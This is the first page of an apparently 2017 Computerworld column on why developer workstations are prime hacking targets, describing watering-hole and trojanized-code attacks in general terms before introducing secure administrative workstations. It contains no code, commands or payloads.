Subscribe / Unsubscribe Enewsletters | Login | Register

Pencil Banner

Your secure developer workstation solution is here, finally!

Roger A. Grimes | June 20, 2017
Developer workstations are high-value targets for hackers and often vulnerable. Now you can protect them using concepts borrowed from securing system admin workstations.

For decades, one of the thorniest problems in computer security is how to better secure developer workstations while still giving them the elevated permissions and privileges--and freedom--they need to get their job done. All the proposed solutions missed the mark. Then, as a side-effect of trying to better secure admins, we found the answer. Finally, we have the right solution: the secure administrative workstation (SAW). Before I describe the SAW, it’s worth reviewing the challenges of securing developers’ workstations and the associated risks.

There is good reason to fear the security consequences of developers using insecure computers to do their job. Developers are often the specific targets of malicious hackers, and a compromise usually gives an attacker immediate elevated access to the most essential, mission-critical content in an enterprise. Want to take over a company or cause reputational damage pretty quickly? Compromise a developer.

This is because developers often have total control of not only their local computer and many other computers and servers, but usually across multiple environments. Many companies have completely different, and separate, environments for production and testing. Testing may even be broken down into multiple testing environments (e.g., test or pre-production).

Developers often have elevated access to all of them. Heck, IT security would be ecstatic if developers didn’t use the same logon name and password across multiple environments. If a hacker compromises the top admin accounts (domain admin, forest admin, etc.) in an environment, they own that environment. Compromise a developer’s credential, however, and you likely can become admin in all environments. It’s a hacker’s nirvana attack scenario. 

There are even specific types of hacker compromises, like “watering hole” attacks where hackers will compromise common, popular developer web sites known to be good places to share code and help troubleshoot programming issues. For example, four of the largest software developer companies in the world were compromised during a single hacker campaign which placed a zero-day Java exploit on an iOS developer web site.

Another favorite, but less common, developer-specific attack is accomplished by the hackers uploading a self-developed piece of code that can be downloaded and used by other developers. The innocuous-looking code often solves a missing piece of the developer puzzle or offers improved administration of a server. Unknown to the subsequent downloaders, the code includes a hidden trapdoor, which will allow the original creators to gain unauthorized access to the server or application.

One of my favorite angles of these types of attacks is when the trojan horse code contains a simple HTTP link that must, according to the open source code license, stay included as perpetual part of the code no matter who uses it. The HTTP link initially points to some innocent source code license or coder statement. But later on, after the code has been downloaded and installed on thousands of sites, the originators change the innocent link to something more malicious, like an encoded Javascript worm that is suddenly launched on every visitor of a web site that has the trojan horse code included. It’s really genius and difficult to stop if you don’t know about such things. Developers not trained in computer security usually don’t.

 

1  2  3  4  5  Next Page 

Sign up for Computerworld eNewsletters.